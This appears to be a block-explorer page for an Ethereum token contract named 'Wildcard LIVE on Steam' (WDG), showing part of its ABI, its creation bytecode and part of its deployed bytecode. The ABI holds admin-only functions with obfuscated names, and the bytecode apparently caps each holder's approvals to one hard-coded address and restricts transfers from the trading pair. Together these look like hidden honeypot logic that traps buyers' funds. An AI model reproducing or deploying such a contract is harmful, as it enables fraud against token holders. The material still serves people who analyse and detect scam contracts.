ame":"NP001001","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"callerConfirmation","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint256","name":"num","type":"uint256"}],"name":"sendOSFNGFbfgr","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405234801561000f575f80fd5b50604051612f4d380380612f4d833981810160405281019061003191906107ee565b838381600790816100429190610a8e565b5080600890816100529190610a8e565b505f731b02da8cb0d097eb8d57a175b88c7d8b4799750690505f8173ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156100b5573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906100d99190610b5d565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963073fd086bc7cd5c481dcc9c85ebe478a1c0b69fcbb96040518363ffffffff1660e01b8152600401610127929190610b97565b6020604051808303815f875af1158015610143573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906101679190610b5d565b90508060015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550505050506101e1816101bf61020a60201b60201c565b600a6101cb9190610d26565b846101d69190610d70565b61021260201b60201c565b6102005f801b6101f561029760201b60201c565b61029e60201b60201c565b5050505050610e5a565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610282575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016102799190610db1565b60405180910390fd5b6102935f838361039460201b60201c565b5050565b5f33905090565b5f6102af83836105b060201b60201c565b61038a57600160035f8581526020019081526020015f205f015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555061032761029760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16847f2f8788117e7eff1d82e926ec794901d17c78024a50270940304540a733656f0d60405160405180910390a46001905061038e565b5f90505b92915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036103e4578060065f8282546103d89190610dca565b925050819055506104b4565b5f60045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561046e578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161046593929190610e0c565b60405180910390fd5b81810360045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036104fb578060065f8282540392505081905550610546565b8060045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516105a39190610e41565b60405180910390a3505050565b5f60035f8481526020019081526020015f205f015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f601f19601f8301169050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b6106738261062d565b810181811067ffffffffffffffff821117156106925761069161063d565b5b80604052505050565b5f6106a4610614565b90506106b0828261066a565b919050565b5f67ffffffffffffffff8211156106cf576106ce61063d565b5b6106d88261062d565b9050602081019050919050565b8281835e5f83830152505050565b5f610705610700846106b5565b61069b565b90508281526020810184848401111561072157610720610629565b5b61072c8482856106e5565b509392505050565b5f82601f83011261074857610747610625565b5b81516107588482602086016106f3565b91505092915050565b5f819050919050565b61077381610761565b811461077d575f80fd5b50565b5f8151905061078e8161076a565b92915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6107bd82610794565b9050919050565b6107cd816107b3565b81146107d7575f80fd5b50565b5f815190506107e8816107c4565b92915050565b5f805f80608085870312156108065761080561061d565b5b5f85015167ffffffffffffffff81111561082357610822610621565b5b61082f87828801610734565b945050602085015167ffffffffffffffff8111156108505761084f610621565b5b61085c87828801610734565b935050604061086d87828801610780565b925050606061087e878288016107da565b91505092959194509250565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806108d857607f821691505b6020821081036108eb576108ea610894565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f6008830261094d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610912565b6109578683610912565b95508019841693508086168417925050509392505050565b5f819050919050565b5f61099261098d61098884610761565b61096f565b610761565b9050919050565b5f819050919050565b6109ab83610978565b6109bf6109b782610999565b84845461091e565b825550505050565b5f90565b6109d36109c7565b6109de8184846109a2565b505050565b5b81811015610a01576109f65f826109cb565b6001810190506109e4565b5050565b601f821115610a4657610a17816108f1565b610a2084610903565b81016020851015610a2f578190505b610a43610a3b85610903565b8301826109e3565b50505b505050565b5f82821c905092915050565b5f610a665f1984600802610a4b565b1980831691505092915050565b5f610a7e8383610a57565b9150826002028217905092915050565b610a978261088a565b67ffffffffffffffff811115610ab057610aaf61063d565b5b610aba82546108c1565b610ac5828285610a05565b5f60209050601f831160018114610af6575f8415610ae4578287015190505b610aee8582610a73565b865550610b55565b601f198416610b04866108f1565b5f5b82811015610b2b57848901518255600182019150602085019450602081019050610b06565b86831015610b485784890151610b44601f891682610a57565b8355505b6001600288020188555050505b505050505050565b5f60208284031215610b7257610b7161061d565b5b5f610b7f848285016107da565b91505092915050565b610b91816107b3565b82525050565b5f604082019050610baa5f830185610b88565b610bb76020830184610b88565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115610c4057808604811115610c1c57610c1b610bbe565b5b6001851615610c2b5780820291505b8081029050610c3985610beb565b9450610c00565b94509492505050565b5f82610c585760019050610d13565b81610c65575f9050610d13565b8160018114610c7b5760028114610c8557610cb4565b6001915050610d13565b60ff841115610c9757610c96610bbe565b5b8360020a915084821115610cae57610cad610bbe565b5b50610d13565b5060208310610133831016604e8410600b8410161715610ce95782820a905083811115610ce457610ce3610bbe565b5b610d13565b610cf68484846001610bf7565b92509050818404811115610d0d57610d0c610bbe565b5b81810290505b9392505050565b5f60ff82169050919050565b5f610d3082610761565b9150610d3b83610d1a565b9250610d687fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610c49565b905092915050565b5f610d7a82610761565b9150610d8583610761565b9250828202610d9381610761565b91508282048414831517610daa57610da9610bbe565b5b5092915050565b5f602082019050610dc45f830184610b88565b92915050565b5f610dd482610761565b9150610ddf83610761565b9250828201905080821115610df757610df6610bbe565b5b92915050565b610e0681610761565b82525050565b5f606082019050610e1f5f830186610b88565b610e2c6020830185610dfd565b610e396040830184610dfd565b949350505050565b5f602082019050610e545f830184610dfd565b92915050565b6120e680610e675f395ff3fe608060405234801561000f575f80fd5b506004361061011f575f3560e01c806336568abe116100ab578063a75a18231161006f578063a75a182314610307578063a9059cbb14610337578063d547741f14610367578063dd62ed3e14610383578063f511d4c6146103b35761011f565b806336568abe1461024f57806370a082311461026b57806391d148541461029b57806395d89b41146102cb578063a217fddf146102e95761011f565b8063248a9ca3116100f2578063248a9ca3146101bf5780632f2ff15d146101ef578063308dee351461020b578063313ce56714610215578063361ee7a0146102335761011f565b806306fdde0314610123578063095ea7b31461014157806318160ddd1461017157806323b872dd1461018f575b5f80fd5b61012b6103cf565b6040516101389190611817565b60405180910390f35b61015b600480360381019061015691906118d5565b61045f565b604051610168919061192d565b60405180910390f35b610179610481565b6040516101869190611955565b60405180910390f35b6101a960048036038101906101a4919061196e565b61048a565b6040516101b6919061192d565b60405180910390f35b6101d960048036038101906101d491906119f1565b6104b8565b6040516101e69190611a2b565b60405180910390f35b61020960048036038101906102049190611a44565b6104d5565b005b6102136104f7565b005b61021d610520565b60405161022a9190611a9d565b60405180910390f35b61024d60048036038101906102489190611ab6565b610528565b005b61026960048036038101906102649190611a44565b610577565b005b61028560048036038101906102809190611ab6565b6105f2565b6040516102929190611955565b60405180910390f35b6102b560048036038101906102b09190611a44565b610638565b6040516102c2919061192d565b60405180910390f35b6102d361069c565b6040516102e09190611817565b60405180910390f35b6102f161072c565b6040516102fe9190611a2b565b60405180910390f35b610321600480360381019061031c91906118d5565b610732565b60405161032e919061192d565b60405180910390f35b610351600480360381019061034c91906118d5565b6107c3565b60405161035e919061192d565b60405180910390f35b610381600480360381019061037c9190611a44565b6107e5565b005b61039d60048036038101906103989190611ae1565b610807565b6040516103aa9190611955565b60405180910390f35b6103cd60048036038101906103c89190611c4b565b610889565b005b6060600780546103de90611cd2565b80601f016020809104026020016040519081016040528092919081815260200182805461040a90611cd2565b80156104555780601f1061042c57610100808354040283529160200191610455565b820191905f5260205f20905b81548152906001019060200180831161043857829003601f168201915b5050505050905090565b5f80610469610900565b9050610476818585610907565b600191505092915050565b5f600654905090565b5f80610494610900565b90506104a1858285610919565b6104ac8585856109ac565b60019150509392505050565b5f60035f8381526020019081526020015f20600101549050919050565b6104de826104b8565b6104e781610ab3565b6104f18383610ac7565b50505050565b5f801b61050381610ab3565b60015f60146101000a81548160ff02191690831515021790555050565b5f6012905090565b5f801b61053481610ab3565b815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050565b61057f610900565b73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16146105e3576040517f6697b23200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6105ed8282610bb1565b505050565b5f60045f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f60035f8481526020019081526020015f205f015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16905092915050565b6060600880546106ab90611cd2565b80601f01602080910402602001604051908101604052809291908181526020018280546106d790611cd2565b80156107225780601f106106f957610100808354040283529160200191610722565b820191905f5260205f20905b81548152906001019060200180831161070557829003601f168201915b5050505050905090565b5f801b81565b5f805f1b61073f81610ab3565b8373ffffffffffffffffffffffffffffffffffffffff1663a9059cbb33856040518363ffffffff1660e01b815260040161077a929190611d11565b6020604051808303815f875af1158015610796573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107ba9190611d62565b91505092915050565b5f806107cd610900565b90506107da8185856109ac565b600191505092915050565b6107ee826104b8565b6107f781610ab3565b6108018383610bb1565b50505050565b5f60055f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f801b61089581610ab3565b5f806108a084610c9b565b80925081935050505f1515811515036108e5576040517f6697b23200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5f82106108f9576108f885836001610dac565b5b5050505050565b5f33905090565b6109148383836001610e7a565b505050565b5f6109248484610807565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8110156109a65781811015610997578281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161098e93929190611d8d565b60405180910390fd5b6109a584848484035f610e7a565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a1c575f6040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610a139190611dc2565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a8c575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401610a839190611dc2565b60405180910390fd5b610a97838383611193565b610aae838383610aa95f801b88610638565b6113af565b505050565b610ac481610abf610900565b6114c3565b50565b5f610ad28383610638565b610ba757600160035f8581526020019081526020015f205f015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550610b44610900565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16847f2f8788117e7eff1d82e926ec794901d17c78024a50270940304540a733656f0d60405160405180910390a460019050610bab565b5f90505b92915050565b5f610bbc8383610638565b15610c91575f60035f8581526020019081526020015f205f015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550610c2e610900565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16847ff6391f5c32d9c69d2a47ea670b442974b53935d1edc7fd64eb21e047a839171b60405160405180910390a460019050610c95565b5f90505b92915050565b5f805f5b8351811015610d9e575f6030858381518110610cbe57610cbd611ddb565b5b602001015160f81c60f81b60f81c610cd69190611e35565b60ff161080610d14575060096030858381518110610cf757610cf6611ddb565b5b602001015160f81c60f81b60f81c610d0f9190611e35565b60ff16115b15610d25575f809250925050610da7565b6001818551610d349190611e69565b610d3e9190611e69565b600a610d4a9190611fcb565b6030858381518110610d5f57610d5e611ddb565b5b602001015160f81c60f81b60f81c610d779190611e35565b60ff16610d849190612015565b83610d8f9190612056565b92508080600101915050610c9f565b50816001915091505b915091565b8015610e1f57670de0b6b3a764000082610dc69190612015565b60025f805f1b81526020019081526020015f205f015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550610e75565b8160025f805f1b81526020019081526020015f205f015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610eea575f6040517fe602df05000000000000000000000000000000000000000000000000000000008152600401610ee19190611dc2565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f5a575f6040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610f519190611dc2565b60405180910390fd5b5f8260025f805f1b81526020019081526020015f206001015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610fb89190612056565b90507370cbb871e8f30fc8ce23609e9e0ea87b6b222f5873ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036110a3575f83118015611060575060025f805f1b81526020019081526020015f206001015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205481115b156110a2575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016110999190611dc2565b60405180910390fd5b5b8260055f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550811561118c578373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925856040516111839190611955565b60405180910390a35b5050505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111e3578060065f8282546111d79190612056565b925050819055506112b3565b5f60045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561126d578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161126493929190611d8d565b60405180910390fd5b81810360045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036112fa578060065f8282540392505081905550611345565b8060045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516113a29190611955565b60405180910390a3505050565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603611497575f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361149257826040517fec442f050000000000000000000000000000000000000000000000000000000081526004016114899190611dc2565b60405180910390fd5b6114bd565b806114bc575f60149054906101000a900460ff16156114bb576114ba8483611514565b5b5b5b50505050565b6114cd8282610638565b6115105780826040517fe2517d3f000000000000000000000000000000000000000000000000000000008152600401611507929190612089565b60405180910390fd5b5050565b5f8160025f805f1b81526020019081526020015f206001015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546115729190612056565b90505f8060025f805f1b81526020019081526020015f205f015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20541180156115d357505f83115b90508015611694575f808311801561163a575060025f805f1b81526020019081526020015f205f015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205483115b9050806116515761164c85845f6116d7565b61168e565b5f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016116859190611dc2565b60405180910390fd5b506116d1565b5f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016116c89190611dc2565b60405180910390fd5b50505050565b801561174b57670de0b6b3a7640000826116f19190612015565b60025f805f1b81526020019081526020015f206001015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506117a2565b8160025f805f1b81526020019081526020015f206001015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f6117e9826117a7565b6117f381856117b1565b93506118038185602086016117c1565b61180c816117cf565b840191505092915050565b5f6020820190508181035f83015261182f81846117df565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61187182611848565b9050919050565b61188181611867565b811461188b575f80fd5b50565b5f8135905061189c81611878565b92915050565b5f819050919050565b6118b4816118a2565b81146118be575f80fd5b50565b5f813590506118cf816118ab565b92915050565b5f80604083850312156118eb576118ea611840565b5b5f6118f88582860161188e565b9250506020611909858286016118c1565b9150509250929050565b5f8115159050919050565b61192781611913565b82525050565b5f6020820190506119405f83018461191e565b92915050565b61194f816118a2565b82525050565b5f6020820190506119685f830184611946565b92915050565b5f805f6060848603121561198557611984611840565b5b5f6119928682870161188e565b93505060206119a38682870161188e565b92505060406119b4868287016118c1565b9150509250925092565b5f819050919050565b6119d0816119be565b81146119da575f80fd5b50565b5f813590506119eb816119c7565b92915050565b5f60208284031215611a0657611a05611840565b5b5f611a13848285016119dd565b91505092915050565b611a25816119be565b82525050565b5f602082019050611a3e5f830184611a1c565b92915050565b5f8060408385031215611a5a57611a59611840565b5b5f611a67858286016119dd565b9250506020611a788582860161188e565b9150509250929050565b5f60ff82169050919050565b611a9781611a82565b82525050565b5f602082019050611ab05f830184611a8e565b92915050565b5f60208284031215611acb57611aca611840565b5b5f611ad88482850161188e565b91505092915050565b5f8060408385031215611af757611af6611840565b5b5f611b048582860161188e565b9250506020611b158582860161188e565b9150509250929050565b5f80fd5b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b611b5d826117cf565b810181811067ffffffffffffffff82111715611b7c57611b7b611b27565b5b80604052505050565b5f611b8e611837565b9050611b9a8282611b54565b919050565b5f67ffffffffffffffff821115611bb957611bb8611b27565b5b611bc2826117cf565b9050602081019050919050565b828183375f83830152505050565b5f611bef611bea84611b9f565b611b85565b905082815260208101848484011115611c0b57611c0a611b23565b5b611c16848285611bcf565b509392505050565b5f82601f830112611c3257611c31611b1f565b5b8135611c42848260208601611bdd565b91505092915050565b5f8060408385031215611c6157611c60611840565b5b5f611c6e8582860161188e565b925050602083013567ffffffffffffffff811115611c8f57611c8e611844565b5b611c9b85828601611c1e565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611ce957607f821691505b602082108103611cfc57611cfb611ca5565b5b50919050565b611d0b81611867565b82525050565b5f604082019050611d245f830185611d02565b611d316020830184611946565b9392505050565b611d4181611913565b8114611d4b575f80fd5b50565b5f81519050611d5c81611d38565b92915050565b5f60208284031215611d7757611d76611840565b5b5f611d8484828501611d4e565b91505092915050565b5f606082019050611da05f830186611d02565b611dad6020830185611946565b611dba6040830184611946565b949350505050565b5f602082019050611dd55f830184611d02565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611e3f82611a82565b9150611e4a83611a82565b9250828203905060ff811115611e6357611e62611e08565b5b92915050565b5f611e73826118a2565b9150611e7e836118a2565b9250828203905081811115611e9657611e95611e08565b5b92915050565b5f8160011c9050919050565b5f808291508390505b6001851115611ef157808604811115611ecd57611ecc611e08565b5b6001851615611edc5780820291505b8081029050611eea85611e9c565b9450611eb1565b94509492505050565b5f82611f095760019050611fc4565b81611f16575f9050611fc4565b8160018114611f2c5760028114611f3657611f65565b6001915050611fc4565b60ff841115611f4857611f47611e08565b5b8360020a915084821115611f5f57611f5e611e08565b5b50611fc4565b5060208310610133831016604e8410600b8410161715611f9a5782820a905083811115611f9557611f94611e08565b5b611fc4565b611fa78484846001611ea8565b92509050818404811115611fbe57611fbd611e08565b5b81810290505b9392505050565b5f611fd5826118a2565b9150611fe0836118a2565b925061200d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611efa565b905092915050565b5f61201f826118a2565b915061202a836118a2565b9250828202612038816118a2565b9150828204841483151761204f5761204e611e08565b5b5092915050565b5f612060826118a2565b915061206b836118a2565b925082820190508082111561208357612082611e08565b5b92915050565b5f60408201905061209c5f830185611d02565b6120a96020830184611a1c565b939250505056fea264697066735822122077c386b370ad8b8847702d5414c53e05d4c40fe624a486b37d250411ae42d6e464736f6c634300081a0033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000005f5e1000000000000000000000000007fa4db882a712a16e8f98fdc8e71958d2c35ee9f000000000000000000000000000000000000000000000000000000000000001657696c6463617264204c495645206f6e20537465616d0000000000000000000000000000000000000000000000000000000000000000000000000000000000035744470000000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561000f575f80fd5b506004361061011f575f3560e01c806336568abe116100ab578063a75a18231161006f578063a75a182314610307578063a9059cbb14610337578063d547741f14610367578063dd62ed3e14610383578063f511d4c6146103b35761011f565b806336568abe1461024f57806370a082311461026b57806391d148541461029b57806395d89b41146102cb578063a217fddf146102e95761011f565b8063248a9ca3116100f2578063248a9ca3146101bf5780632f2ff15d146101ef578063308dee351461020b578063313ce56714610215578063361ee7a0146102335761011f565b806306fdde0314610123578063095ea7b31461014157806318160ddd1461017157806323b872dd1461018f575b5f80fd5b61012b6103cf565b6040516101389190611817565b60405180910390f35b61015b600480360381019061015691906118d5565b61045f565b604051610168919061192d565b60405180910390f35b610179610481565b6040516101869190611955565b60405180910390f35b6101a960048036038101906101a4919061196e565b61048a565b6040516101b6919061192d565b60405180910390f35b6101d960048036038101906101d491906119f1565b6104b8565b6040516101e69190611a2b565b60405180910390f35b61020960048036038101906102049190611a44565b6104d5565b005b6102136104f7565b005b61021d610520565b60405161022a9190611a9d565b60405180910390f35b61024d60048036038101906102489190611ab6565b610528565b005b61026960048036038101906102649190611a44565b610577565b005b61028560048036038101906102809190611ab6565b6105f2565b6040516102929190611955565b60405180910390f35b6102b560048036038101906102b09190611a44565b610638565b6040516102c2919061192d565b60405180910390f35b6102d361069c565b6040516102e09190611817565b60405180910390f35b6102f161072c565b6040516102fe9190611a2b565b60405180910390f35b610321600480360381019061031c91906118d5565b610732565b60405161032e919061192d565b60405180910390f35b610351600480360381019061034c91906118d5565b6107c3565b60405161035e919061192d565b60405180910390f35b610381600480360381019061037c9190611a44565b6107e5565b005b61039d60048036038101906103989190611ae1565b610807565b6040516103aa9190611955565b60405180910390f35b6103cd60048036038101906103c89190611c4b565b610889565b005b6060600780546103de90611cd2565b80601f016020809104026020016040519081016040528092919081815260200182805461040a90611cd2565b80156104555780601f1061042c57610100808354040283529160200191610455565b820191905f5260205f20905b81548152906001019060200180831161043857829003601f168201915b5050505050905090565b5f80610469610900565b9050610476818585610907565b600191505092915050565b5f600654905090565b5f80610494610900565b90506104a1858285610919565b6104ac8585856109ac565b60019150509392505050565b5f60035f8381526020019081526020015f20600101549050919050565b6104de826104b8565b6104e781610ab3565b6104f18383610ac7565b50505050565b5f801b61050381610ab3565b60015f60146101000a81548160ff02191690831515021790555050565b5f6012905090565b5f801b61053481610ab3565b815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050565b61057f610900565b73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16146105e3576040517f6697b23200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6105ed8282610bb1565b505050565b5f60045f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f60035f8481526020019081526020015f205f015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16905092915050565b6060600880546106ab90611cd2565b80601f01602080910402602001604051908101604052809291908181526020018280546106d790611cd2565b80156107225780601f106106f957610100808354040283529160200191610722565b820191905f5260205f20905b81548152906001019060200180831161070557829003601f168201915b5050505050905090565b5f801b81565b5f805f1b61073f81610ab3565b8373ffffffffffffffffffffffffffffffffffffffff1663a9059cbb33856040518363ffffffff1660e01b815260040161077a929190611d11565b6020604051808303815f875af1158015610796573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107ba9190611d62565b91505092915050565b5f806107cd610900565b90506107da8185856109ac565b600191505092915050565b6107ee826104b8565b6107f781610ab3565b6108018383610bb1565b50505050565b5f60055f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f801b61089581610ab3565b5f806108a084610c9b565b80925081935050505f1515811515036108e5576040517f6697b2320000000000000